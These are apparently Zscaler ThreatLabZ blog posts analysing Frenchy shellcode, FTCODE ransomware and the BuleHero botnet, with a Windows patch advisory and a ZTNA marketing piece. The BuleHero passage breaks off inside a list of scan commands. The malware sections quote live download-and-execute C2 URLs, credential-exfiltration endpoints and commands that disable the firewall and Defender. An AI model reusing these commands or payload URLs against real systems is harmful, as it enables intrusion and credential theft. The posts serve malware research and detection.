Frenchy – Shellcode in the Wild
For the past few months, the Zscaler ThreatLabZ research team has seen a number of AutoIt and .NET samples from different malware families using what is being called Frenchy shellcode. It is so named because of the mutex it creates: frenchy_shellcode_{version}. In this blog, we provide a brief analysis of a .NET sample that uses the Frenchy shellcode and an overview of the malware families using it.
As the execution of the malware begins, it extracts an embedded compressed resource with the name asmz://4da3bcc9092d2b15c67c8bb6a3248c6d/279552/z. When decompressed, this resource turns out to be a dynamic-link library (DLL) file, which is also .NET compiled with the MD5 2d80d567add3e9ebe93118c28fd96ad8.
Figure 1: Decompression routine
Figure 2: Compressed resource name stored in the variable
Control is transferred to this extracted DLL by invoking one of its routines named Average().
Figure 3: Average() function invoked in the extracted DLL
During execution, this DLL extracts the embedded AES-encrypted resource with the name 501Yek31KY. The AES key used for decryption is hardcoded with the value zlauDo4j2s76f3bAu7vJla9qxo4T9fDA. On decryption, the file turns out to be another .NET compiled executable with the MD5 9f93df82804d1467ba0096f91ecf091b.
When execution begins, the executable performs two checks for virtual environment detection and terminates itself if either of the two is successful:
1. If SbieDll.dll is present
2. If the caption of the main window of any of the running processes is empty
For persistence, it creates a copy of itself in the %APPDATA%/Tasks/ folder with the name ThumbnailExtractionHost.exe, a VBS file named vTzzHA5v.vbs in the same folder that invokes ThumbnailExtractionHost.exe, and a URL file named 89f429NZ.url in the startup directory that invokes vTzzHA5v.vbs.
Finally, the Frenchy shellcode and the main malware binary are extracted. This executable contains two resources encrypted with Advanced Encryption Standard (AES). One resource with the name 9BMPzLT7ztLkxO7r contains the Frenchy shellcode and another with the name HC8354RuK8FCQSpg contains the main malware binary.
Figure 4: AES encrypted resource – malware payload
Figure 5: Extracted main malware payload [MD5: ac8ef8b4aeede1adab7366ca7e5a75be (AgentTesla)]
Figure 6: AES encrypted resource – Frenchy shellcode
Figure 7: Extracted Frenchy shellcode [MD5: abdb5f121849f3f3718768d37abe0173]
Memory is allocated for the shellcode and the main payload. Control is transferred to the Frenchy shellcode by creating a delegate from its memory location pointer and calling it with two arguments:
Currently executing binary full path
Pointer to memory location of main payload
Figure 8: Control transferred to Frenchy shellcode memory location
Frenchy Shellcode Analysis
The main functionality of the shellcode is hollow process injection, which injects malicious code into the memory of another process. Execution of the shellcode starts with a relative jump instruction, with the two arguments passed to the shellcode available on the stack.
Following the jump instruction, all the strings the shellcode will use are generated on the stack. The interesting thing this shellcode does is map all the required DLLs a second time in memory and make further calls through these newly loaded copies. This helps bypass the user-mode API monitoring performed by some sandboxes. Four DLLs, namely advapi32.dll, ntdll.dll, user32.dll, and kernel32.dll, are mapped using the ZwOpenSection and ZwMapViewOfSection APIs. The name passed to ZwOpenSection has the format \\KnownDlls32\\{dll_name}.dll.
Once kernel32.dll is loaded, the Frenchy shellcode resolves the addresses of LoadLibrary and GetProcAddress to load further required DLLs and resolve the necessary API addresses.
When this initialization phase is complete, the shellcode's main functionality begins. First, it creates the mutex with the name frenchy_shellcode_{version}, where {version} is 002 in this case.
Figure 9: Frenchy shellcode version 002
The Frenchy shellcode creates a new process of the currently executing binary in suspended mode.
Figure 10: Creating new process in suspended mode
It creates a new section to be shared with the newly created process.
Figure 11: Shared section
Finally, the shellcode maps the view of this section into a newly created process, copies the main malware payload to this mapped view, modifies and sets the context of the newly created process, and starts the process main thread by calling NtResumeThread.
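The hollowing chain described above (KnownDlls re-mapping, suspended child, shared section mapped into the child, context change, NtResumeThread) can be matched as an ordered sequence of events per process. The detector below is an added example, not Zscaler's code or the shellcode; it assumes a kernel- or ETW-level trace, since user-mode hooks are exactly what the DLL re-mapping sidesteps, and the trace format ("<pid> <api> key=value ...") and the sample lines are constructed for this example.

```python
"""Detection of the Frenchy-style hollowing chain over a constructed API trace.

Added example, not Zscaler's code and not the shellcode. Assumes a kernel- or
ETW-level trace (user-mode hooks are what the shellcode sidesteps by
re-mapping its DLLs from \\KnownDlls32). Line format, constructed here:
"<pid> <api> key=value ...".
"""
import re
from collections import defaultdict

# Stages of the chain in the order the report describes them. A stage is
# (label, api, predicate(pid, kwargs)); a process advances one stage at a time.
STAGES = [
    ("remap-knowndll", "ZwOpenSection",
     lambda pid, kv: kv.get("name", "").lower().startswith("\\knowndlls32\\")),
    ("spawn-suspended", "CreateProcessW",
     lambda pid, kv: "create_suspended" in kv.get("flags", "").lower()),
    ("shared-section", "NtCreateSection", lambda pid, kv: True),
    ("map-into-child", "NtMapViewOfSection",
     lambda pid, kv: kv.get("process") not in (None, str(pid))),  # remote mapping only
    ("set-context", "SetThreadContext", lambda pid, kv: True),
    ("resume", "NtResumeThread", lambda pid, kv: True),
]
MUTEX_RE = re.compile(r"frenchy_shellcode_\d+", re.IGNORECASE)


def parse_line(line):
    pid, api, *rest = line.split()
    kv = dict(tok.split("=", 1) for tok in rest if "=" in tok)
    return int(pid), api, kv


def verdict(s):
    n = len(s["stages"])
    if n == len(STAGES):
        base = "hollow-process-injection"
    elif n >= 3:
        base = "partial-hollowing-chain"
    else:
        return "benign"
    return f"{base} ({s['mutex']})" if s["mutex"] else base


def analyse(trace):
    """Return {pid: {"stages": [...], "mutex": str|None, "verdict": str}}."""
    state = defaultdict(lambda: {"stages": [], "mutex": None})
    for line in trace.strip().splitlines():
        pid, api, kv = parse_line(line)
        s = state[pid]
        if api == "CreateMutexW":
            m = MUTEX_RE.search(kv.get("name", ""))
            if m:
                s["mutex"] = m.group(0)
        nxt = len(s["stages"])
        if nxt < len(STAGES):
            label, want_api, pred = STAGES[nxt]
            if api == want_api and pred(pid, kv):
                s["stages"].append(label)
    for s in state.values():
        s["verdict"] = verdict(s)
    return dict(state)


# Constructed trace: pid 4120 walks the whole chain, pid 7788 is a normal launcher.
SAMPLE_TRACE = r"""
4120 ZwOpenSection name=\KnownDlls32\ntdll.dll access=SECTION_MAP_READ
4120 ZwMapViewOfSection process=4120
4120 ZwOpenSection name=\KnownDlls32\kernel32.dll access=SECTION_MAP_READ
4120 CreateMutexW name=frenchy_shellcode_002
4120 CreateProcessW image=C:\Users\victim\AppData\Roaming\Tasks\ThumbnailExtractionHost.exe flags=CREATE_SUSPENDED
4120 NtCreateSection size=0x3a000 protect=PAGE_EXECUTE_READWRITE
4120 NtMapViewOfSection process=5512
4120 SetThreadContext thread=0x1c4
4120 NtResumeThread thread=0x1c4
7788 CreateProcessW image=C:\Windows\System32\notepad.exe flags=0
7788 NtResumeThread thread=0x200
"""

if __name__ == "__main__":
    for pid, s in analyse(SAMPLE_TRACE).items():
        print(pid, s["verdict"], s["stages"])
```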
Malware variants using the Frenchy shellcode:
Win32.Backdoor.404Keylogger 6a8a308fd9d93877405edddaca2dc0b1
Win32.Backdoor.AgentTesla ff87170119ffe5da1a9933eac4813e89
Win32.Backdoor.AysncRAT 4e0620db87741809db739b36d493efd3
Win32.Backdoor.DarkComet aca05d97aa34360a18ce7e4a331195b8
Win32.Backdoor.HawkEye c1da6168e4ce782169295858057d6a82
Win32.Backdoor.Keybase db5fe533c78602a3d4e5a2a307782855
Win32.Backdoor.LimeRat 7f3b73f4680cd45b2f06cd991c26b60a
Win32.Backdoor.Nanocore d18509eb899f634f579e154b226c1f72
Win32.Backdoor.NetWiredRC 2d1ed53e7af0864f0916a4ce4f5e40b7
Win32.Backdoor.NjRat a7b38bf292212efd6c0bf11060483b19
Win32.Backdoor.NjRatLime 88c674e2dcd55b5e8672c1a063d06fd4
Win32.Backdoor.PhoenixKeylogger 382609b2a5c90f287b466f55911238d2
Win32.Backdoor.PredatorLogger 16cbd896990793871fd3fd7bcd23cf1a
Win32.Backdoor.QuasarRAT db07aca234c3f12a141760cfc6a46e0e
Win32.Backdoor.RemcosRAT 4ef1c56657d74aa09d77573273f99750
Win32.PWS.AZORult 6e33a3075b667eab19647f1d149a510f
Win32.PWS.FormBook 6e685961cc335b33d05e6415700fcf96
Win32.Ransom.Adame 20716b0abbf051ec151fecc0cc957145
Win32.Ransom.Phobos 0e1b676f95c0e51163178ffdd99817c8
Win32.Trojan.APT33 9aa2f7959f31196f6c5aa37ae3c5a2ae
Conclusion
Zscaler ThreatLabZ is actively tracking this mode of delivery and malware families involved to ensure coverage for Zscaler customers.
Categories: Security Posts
FTCODE Ransomware — New Version Includes Stealing Capabilities
Recently, the Zscaler ThreatLabZ team came across PowerShell-based ransomware called “FTCODE,” which targets Italian-language users. An earlier version of FTCODE ransomware was being downloaded using a document file that contained malicious macros. In the recent campaign, the ransomware is being downloaded using VBScript.
Figure 1: FTCODE downloaders observed in the Zscaler cloud (Office documents in red and VBScripts in yellow)
The latest version we’ve seen in the Zscaler cloud contains version number 1117.1. We also came across this malware with version numbers from 1001.7 to 1117.1. In this blog, we’ll describe the infection method and its techniques for stealing credentials.
Technical details
Infection starts with spam emails containing malicious macro documents and, more recently, containing links to VBScripts that further download a PowerShell script known as FTCODE ransomware. Once a user executes the VBScript, it executes the PowerShell script shown in the screenshot below.
Figure 2: PowerShell script to download a decoy image and the ransomware
The script first downloads a decoy image into the %temp% folder and opens it, trying to trick users into believing they simply received an image, while in the background it downloads and runs the ransomware.
Figure 3: Decoy image
The downloaded script is saved in %Public%\Libraries\WindowsIndexingService.vbs. The screenshot below displays the command-and-control (C&C) request for downloading the VBScript.
Figure 4: C&C communication request to download VBScript
Persistence
Further, the malware creates a shortcut file called windowsIndexingService.lnk in the victim’s startup folder, so it will execute at every reboot. The shortcut file executes the %Public%\Libraries\WindowsIndexingService.vbs. It also creates a scheduled task named WindowsApplicationService for executing the WindowsIndexingService.vbs file.
FTCODE checks whether the file %temp%\quanto00.tmp exists. If the file exists and was created more than 30 minutes ago, FTCODE writes the current time into it; otherwise, the script exits. It also checks for the file %public%\OracleKit\w00log03.tmp, which contains a GUID; if the file is not found, it writes a GUID into w00log03.tmp and sets the file attribute to hidden.
C&C communication
The malware sends information to its C&C as shown in the screenshot below.
Figure 5: Sending data to the C&C
ver = 1117.1 (version)
vid = vb5 (campaign identifier)
guid = GUID
ext = first 6 characters of the newly generated GUID (extension of encrypted files)
r1 = base64( base64(encrypted(8-character GUID + 42 random characters)) ; base64(encrypted(23 random characters + 11 random characters)) )
The malware generates these random characters and encrypts them using the RSA algorithm; the RSA key is hardcoded in the script. The randomly generated strings are later used to derive the encryption password.
After getting a response from the server, the malware writes the current date and time into %temp%\quanto00.tmp. If it gets no response, it terminates itself. It then sends another POST request to the C&C server with the &status=start parameter, as shown below, and starts the encryption process.
Figure 6: Sending status update to C&C
Encryption
The malware searches for all drives with at least 50 KB of free space and starts encrypting files with the extensions below.
Figure 7: Extension list for encryption
FTCODE generates a password from the GUID and the random character set generated earlier. It uses Rijndael symmetric-key encryption to encrypt 40960 bytes of each file with one of the above extensions. The initialization vector is based on 11 randomly generated characters.
Figure 8: Encryption code
After encrypting a file, FTCODE appends an extension made of the first 6 characters of the newly generated GUID and drops the ransom note "READ_ME_NOW.htm" in the directory that contains the encrypted files. The personal ID in the ransom note is the newly generated GUID.
Figure 9: Ransom note
The earlier FTCODE version's encryption key was generated from the hardcoded string "BXCODE hack your system" and a randomly generated key, and its initialization vector was based on the hardcoded string "BXCODE INIT." The earlier version (1001.1) of FTCODE adds the .FTCODE extension after encryption. All versions use the same ransom note.
Stealer capability
The latest version of FTCODE adds stealing functionality that was absent in earlier versions. It steals credentials from the browsers and email clients below.
Internet Explorer
Mozilla Firefox
Mozilla Thunderbird
Google Chrome
Microsoft Outlook
Internet Explorer
The script steals the stored credentials from the Internet Explorer web browser, locating the history folder with $shell.NameSpace(34). It takes the history details and decrypts the stored credentials using the information in the registry key HKCU:\Software\Microsoft\Internet Explorer\IntelliForms\Storage2. It also checks whether the operating system is newer than Windows 7 and, if so, fetches credentials from the vault as shown in the code below.
Figure 10: Code to steal credentials from vault
Mozilla Firefox and Mozilla Thunderbird
The script checks the below paths and fetches the credentials from the Mozilla Firefox browser and the Mozilla Thunderbird email client.
SystemDrive\Program Files\Mozilla Firefox
SystemDrive\Program Files\Mozilla Thunderbird
SystemDrive\Program Files (x86)\Mozilla Firefox
SystemDrive\Program Files (x86)\Mozilla Thunderbird
Google Chrome
The script steals credentials from the Google Chrome browser from the file %UserProfile%\AppData\Local\Google\Chrome\User Data\*\Login Data.
Figure 11: Code to steal credentials from the Google Chrome browser
Microsoft Outlook
The script steals saved credentials by accessing the following registry keys.
HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*
HKCU:\Software\Microsoft\Office\1[56].0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*
Next, it sends a post request with the guid=temp_1235266078&crederror=start chooseArch data to kind.its1ofakind[.]com. Further, it sends the stolen data to its C&C as shown in the below screenshot.
Figure 12: Sending stolen credentials to C&C
guid = hardcoded in script
cred = stolen credentials
The stolen credentials are sent in the format below; the username and password are Base64 encoded.
Format: {"URL":[{"Username":"Password"},{"Username":"Password"}]}
Finally, after sending data, it sends a post request with guid=temp_1235266078&crederror=SUCCESS.
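The C&C exchanges described above (the version beacon with its nested-base64 r1 field, the status update, the crederror markers and the credential payload) can be triaged from captured POST bodies. The parser below is an added example, neither the malware's script nor Zscaler's code; the sample bodies, the GUID and the stand-ins for the RSA ciphertexts inside r1 are all constructed here.

```python
"""Triage of captured FTCODE-style C&C POST bodies.

Added example; neither the malware's script nor Zscaler's code. Classifies
each body by the parameter set described in the report, checks that r1 has
the nested base64 layout described, and decodes the credential payload.
"""
import base64
import json
from urllib.parse import parse_qs, urlencode


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


def r1_segments(r1: str) -> list:
    """r1 = base64( base64(enc(A)) ; base64(enc(B)) ). Return the two inner
    blobs (still RSA-encrypted, so opaque) or [] if the layout differs."""
    try:
        inner = base64.b64decode(r1, validate=True).decode("ascii")
        return [base64.b64decode(p.strip(), validate=True) for p in inner.split(";")]
    except (ValueError, UnicodeDecodeError):
        return []


def decode_creds(cred_field: str) -> list:
    """Decode {"URL":[{"b64user":"b64pass"}, ...]} into (url, user, password)."""
    out = []
    for url, entries in json.loads(cred_field).items():
        for entry in entries:
            for user_b64, pass_b64 in entry.items():
                out.append((url,
                            base64.b64decode(user_b64).decode("utf-8", "replace"),
                            base64.b64decode(pass_b64).decode("utf-8", "replace")))
    return out


def classify(body: str):
    """Return (kind, details) for one application/x-www-form-urlencoded body."""
    q = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if "cred" in q:
        return "cred-exfil", {"guid": q.get("guid"), "creds": decode_creds(q["cred"])}
    if "crederror" in q:
        return "cred-marker", {"guid": q.get("guid"), "stage": q["crederror"]}
    if "status" in q:
        return "status", {"guid": q.get("guid"), "status": q["status"]}
    if {"ver", "vid", "guid", "ext", "r1"}.issubset(q):
        return "beacon", {
            "version": q["ver"],
            "campaign": q["vid"],
            "guid": q["guid"],
            "ext": q["ext"],
            "r1_segments": len(r1_segments(q["r1"])),
        }
    return "unknown", q


def triage(bodies):
    return [classify(b) for b in bodies]


# ---- constructed sample traffic (not from a real infection) ----------------
GUID = "c0ffee1d-0000-4000-8000-00000000beef"
R1 = _b64((_b64(b"<rsa-ciphertext-1>") + ";" + _b64(b"<rsa-ciphertext-2>")).encode())
CRED_JSON = json.dumps({"https://mail.example.test/": [{_b64(b"alice"): _b64(b"Winter2019!")}]})
SAMPLES = [
    urlencode({"ver": "1117.1", "vid": "vb5", "guid": GUID, "ext": GUID[:6], "r1": R1}),
    urlencode({"guid": GUID, "status": "start"}),
    "guid=temp_1235266078&crederror=start",
    urlencode({"guid": "temp_1235266078", "cred": CRED_JSON}),
    "guid=temp_1235266078&crederror=SUCCESS",
]

if __name__ == "__main__":
    for kind, details in triage(SAMPLES):
        print(kind, details)
```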
Conclusion
The FTCODE ransomware campaign is rapidly changing. Because it is written in a scripting language, it offers threat actors multiple advantages: features can be added, removed or tweaked far more easily than in traditionally compiled malware. The Zscaler ThreatLabZ team continues to monitor this threat and others to ensure that Zscaler customers are protected.
IOCs:
Critical Windows Update - CryptoAPI Spoofing, Windows Remote Desktop vulnerabilities
Background
Earlier today, Microsoft released several security updates as part of its regular monthly release known as Patch Tuesday. Some of the issues patched in today's update are critical and have prompted an emergency directive from the Cybersecurity and Infrastructure Security Agency (CISA) for certain U.S. government agencies. Everyone running a vulnerable operating system should apply this security update. Large organizations following 15/30/60-day patch cycles should consider making an exception and applying the patches as soon as possible, especially if running one of the vulnerable operating systems.
What are the issues?
1. CVE-2020-0601 - CryptoAPI spoofing vulnerability
A spoofing vulnerability exists in the way Windows CryptoAPI validates the Elliptic Curve Cryptography (ECC) certificates. This vulnerability allows an attacker to use spoofed ECC certificates for signing malicious files to evade detection or target specific hostnames to evade browser security alerts.
Systems impacted: Several versions of Windows 10 and Windows Server 2016, 2019 [Check the reference for specific details]
2. CVE-2020-0609, CVE-2020-0610 - Windows Remote Desktop Gateway remote code execution vulnerability
An unauthenticated attacker could exploit a remote code execution vulnerability in Windows Remote Desktop Gateway by connecting over RDP and sending specially crafted requests. No user interaction is required for exploiting this vulnerability.
Systems impacted: Windows Server 2012, 2016, 2019 [Check the reference for specific details]
3. CVE-2020-0611 - Windows Remote Desktop Client remote code execution vulnerability
An attacker could exploit a remote code execution vulnerability in Windows Remote Desktop Client by tricking the user into connecting to a malicious server hosting this exploit.
Systems impacted: Several versions of Windows 7, 8, 10 and Windows Server 2008, 2012, 2016, 2019 [Check the reference for specific details]
What can you do to protect yourself?
Apply the security updates released by Microsoft immediately from the following location:
https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Jan
Zscaler coverage
Zscaler Cloud Sandbox provides proactive coverage against worm payloads and advanced threats, such as ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.
We have also deployed several in-line signatures for detecting exploitation attempts of CryptoAPI spoofing vulnerability.
Additionally, Zscaler customers can leverage the SSL inspection feature and block such spoofed certificates under 'Untrusted Server Certificates'. This will block any connection to destinations serving such spoofed certificates.
References:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0611
Remote Access VPNs Have Ransomware on Their Hands
Another day and, unfortunately, another cyberattack accidentally introduced by VPN.
According to a Computer Weekly article, Travelex was hit by Sodinokibi ransomware, which disabled the foreign exchange company’s IT systems on New Year’s Eve. The attack was made possible when the company forgot to patch its Pulse Secure VPN servers.
Sadly, these reports are becoming common as VPNs are now the favorite target of cybercriminals.
Antiquated leads to attacked
When remote access VPNs were first introduced 30 years ago, they were pretty awesome. Remote access from anywhere was a concept that was forward-thinking and game-changing. But VPNs were created during a time when most apps were running in the data center, which could easily be secured with a bunch of network security appliances.
However, the world has changed as internal apps have moved to the cloud. You have to deliver a great experience, which is what users expect, with the knowledge that 98 percent of security attacks stem from the internet.
Remote access VPNs require servers to be exposed to the internet and users to be placed onto the corporate network through static tunnels that drive holes through firewalls. Now the very same technology built to protect businesses has left them vulnerable to modern malware and ransomware attacks.
So how exactly does this happen?
Footprint of a malware attack
Just this past week, Medium.com published an article describing how Sodinokibi ransomware gets introduced via a VPN. Let’s take a high-level look at the typical process for how malware is introduced to a network through a VPN vulnerability:
Cybercriminals scan the internet for unpatched remote access VPN servers.
Remote access to the network is achieved (without valid usernames or passwords).
Attackers view logs and cached passwords in plain text.
Domain admin access is gained.
Lateral movement takes place across the entire network.
Multifactor authentication (MFA) and endpoint security are disabled.
Ransomware (ex. Sodinokibi) is pushed to network systems.
The company is held up for ransom.
Negative impacts of VPN
Many organizations still feel that remote-access VPNs are necessary. And, in some cases, they may very well be. But, more often, VPNs are opening the network to the internet and, as a result, the business to increased risk.
Patching is often slow or forgotten – Remembering, and even finding time to patch VPN servers, is plain difficult. Teams are asked to do more with less, often creating a human challenge that leads to security vulnerabilities.
Placing users on the network – Perhaps the genesis of all the issues related to remote-access VPNs. For VPNs to work, networks must be discoverable. This exposure opens the organization to attack.
Lateral risk at exponential scale – Once on the network, malware can spread laterally, despite efforts to perform network segmentation (which is a complex process in itself). As mentioned above, this can also lead to the takedown of other security technologies, such as MFA and endpoint security.
The business’ reputation – Your customers trust that you will protect their information and provide the best level of service to them. To do this, businesses must be able to protect themselves. News of a ransomware attack has a detrimental impact on your brand reputation.
Making the case for a new approach
The negative impacts of VPN have led to a search for an alternative solution. Gartner says that this buzz has created a world where, “By 2023, 60% of enterprises will phase out most of their remote access virtual private networks (VPNs) in favor of zero trust network access (ZTNA).”
If you are considering alternative methods, such as ZTNA, keep these points in mind when positioning it to your executives:
Minimize business risk – ZTNA allows for access to specific business applications (based on policy) without the need for network access. Also, there is no infrastructure ever exposed, so ZTNA removes the visibility of apps and services on the internet.
Reduce costs – ZTNA can often be fully cloud-delivered as a service, which means there are no servers to purchase, patch, or manage. This is not limited to just the VPN server. The entire VPN inbound gateway can now be smaller or fully removed (external firewall, DDoS, VPN, internal firewall, load balancer, etc.).
Deliver a better user experience – Given the increased availability of cloud ZTNA services when compared to limited VPN inbound appliance gateways, remote users are provided with a faster and more seamless access experience regardless of application, device or location.
NOTE: Not all ZTNA solutions are the same. Beware of vendors that call themselves “zero trust” but offer solutions that continue to place users on the network and expose business apps to the internet.
If you’re looking to replace your remote access VPN, you might find this page helpful. In the meantime, don’t forget to patch your VPN servers!
Christopher Hines is the Head of Product Marketing for Zscaler Private Access and Z App.
A look at the recent BuleHero botnet payload
Ever since the 2017 outbreak of WannaCry, NotPetya, and BadRabbit ransomware, as well as the WannaMine cryptocurrency campaign, there has been a steep increase in malware that uses the now infamous ShadowBroker’s leaked exploits—EternalBlue, EternalChampion, EternalRomance, and EternalSynergy—for lateral propagation.
Alongside these exploits, many other modules such as MimiKatz, PsExec, and WMIC have been observed as a means to propagate malware on networks. Traditional attack vectors like brute force attacks are also playing a crucial role in infecting other hosts to spread malware. The ThreatLabZ team is keeping a close eye on these and other new lateral movement techniques and the malware they are attempting to propagate. While doing research on this topic, we landed on a botnet called “BuleHero,” which has a number of lateral movement techniques embedded in it. In this report, we will provide a brief overview of the malware dropped by the BuleHero botnet, while focusing on the lateral movement aspect of BuleHero botnet.
BuleHero is named after the domain “bulehero[.]in,” which was found in the initial botnet binary. This botnet leverages a variety of web exploits to enable it to intrude on unpatched web servers. It also contains many other exploits to help it spread across the network. It not only tries to spread on internal networks but also on the internet. The Zscaler Cloud Sandbox service detected this malware.
URL: aa[.]0xbdairolkoie[.]space/xs.exe
MD5: F864506F9797592321CF4C6A0BB5F199
Let's take a deeper look into the different modules of this botnet.
The “xs.exe” is an installer file that downloads “swpuhostd.exe” from the URL “aa[.]0xbdairolkoie[.]space/swpuhostd.exe” and stores it at “C:\WebKitSdk\2.25.16\swpuhostd.exe” location.
It then fetches the configuration file (cfg.ini) from one of the nine hardcoded URLs.
Fig 1: BuleHero configuration
The botnet checks for updates from the IPs 172.104.91.191 and 139.162.2.123. The URL "hxxp://fk[.]0xbdairolkoie[.]space/download.exe" is embedded in the payload or shellcode used to compromise other machines on the network: upon successful exploitation, the file downloaded from this URL is executed on the newly infected system, which in turn tries to spread further. The botnet also contains an embedded miner that connects to the "mi.oops[.]best:80, mx.oops[.]best:443" mining pool.
On a successful run, it creates copies of itself at the locations below on the infected system.
C:\\Windows\\uhctnicb\\mftzlgg.exe
C:\\Windows\\Fonts\\mftzlgg.exe
%TEMP%\\388954562\\TemporaryFile
To be persistent on the system, the malware does the following:
Creates a service with name “bnttpgkqt” and with BinaryPathName as "C:\\Windows\\uhctnicb\\mftzlgg.exe"
Creates a task with the name "bicfnzlke," which triggers the main malware file every minute with full permissions:
cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"bicfnzlke\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\mftzlgg.exe\"
Makes a run entry with the name “bnttpgkqt” for “C:\Windows\uhctnicb\mftzlgg.exe” at “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”
It also tries to bypass security measures on the system, such as the firewall. The botnet first deletes all the IPsec firewall rules and then adds a few of its own to enable access to the NetBIOS and SMB protocols.
Below are the commands found in the binary that manipulate the firewall rules:
netsh ipsec static delete all
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
cmd /c net stop SharedAccess
cmd /c netsh firewall set opmode mode=disable
cmd /c netsh Advfirewall set allprofiles state off
cmd /c net stop MpsSvc
cmd /c net stop WinDefend
cmd /c net stop wuauserv
cmd /c sc config MpsSvc start= disabled
cmd /c sc config SharedAccess start= disabled
cmd /c sc config WinDefend start= disabled
cmd /c sc config wuauserv start= disabled
The malware also changes the file associations in HKEY_CLASSES_ROOT for the extensions ".bat, .cmd, .js, .vbs, .vbe, .reg, .ps1" to txtfile, so that files with these extensions are treated as text files.
The botnet contains many embedded files in it. It drops those files in the following directory structure at “C:\Windows\ziheeghmq”:
Fig 2: Drop location
Corporate – Mimikatz password grabbing tool
qvrmuzmcf – Port scanning tools
UnattendGC – Eternal Blue attack kit
It drops XMRig miner at “%TEMP%\\cnaqzbggt\\svtink.exe” and it also drops a Gh0st RAT at “%systemroot%\\vqbbqs.exe.”
Payloads
XMRig Miner:
The XMRig miner uses a configuration file “%TEMP%\\cnaqzbggt\\config.json” dropped by the botnet.
Fig 3: XMRig miner configuration file
It’s compiled with open-source XMRig miner and uses “mi.oops[.]best:80” and “mx.oops[.]best:443” mining pool.
Fig 4: XMRig miner network communication
Gh0st RAT:
Gh0st RAT is an open-source RAT. The source code is public and it has been used by multiple groups. First, it creates a service of itself with the name “EaepRegSvc.” It creates a mutex of the name “ox.mygoodluck.best:12000:EaepRegSvc." It makes a DNS request for ox.mygoodluck[.]best to get the IP address, which is 185.147.34[.]106. This RAT communicates on 185.147.34[.]106:12000 to receive commands and send the data with encryption.
Fig 5: Gh0st RAT CNC traffic
Lateral movement
To this point, we have provided a few details about the embedded malware payloads dropped by the BuleHero botnet. Now we will shift our focus to the lateral movement modules, which are embedded in this botnet. Below are the modules that are used to perform lateral spreading.
Port Scanning
In order to spread across a network, it is important for malware to scan the network to identify the exposed and vulnerable machines connected to the network. To achieve this scan, “Swpuhostd.exe” drops a port scanning tool at the location “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\vqfevffuz.exe.”
The botnet first fetches the public IP address of the infected system by accessing "hxxp://v4.ipv6-test[.]com/api/myip.php", from which it generates the IP subnet of the public network of the infected system and stores it in "C:\\Windows\\ziheeghmq\\qvrmuzmcf\\ip.txt." It also adds intranet subnets and public subnets that are randomly generated by the botnet.
Fig 6: IP subnets in “ip.txt”
After creating the IP ranges, the botnet starts the port scanning module to scan IP addresses specified in the ip.txt with a given port. The botnet also generates ports that are given as input to the below command. It generates ports that belong to web applications. It also contains a few hard-coded ports like 135 (DCE/RPC), 139 (NetBIOS), 445 (SMB), and 3389 (RDP).
Scanning command structure (the port number is appended after -p):
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p
Example
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8020
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8040
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 7001
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 7070
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8050
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8282
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8082
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8085
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8087
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8088
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8983
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8060
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8080
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 9090
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8001
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8083
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8888
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8181
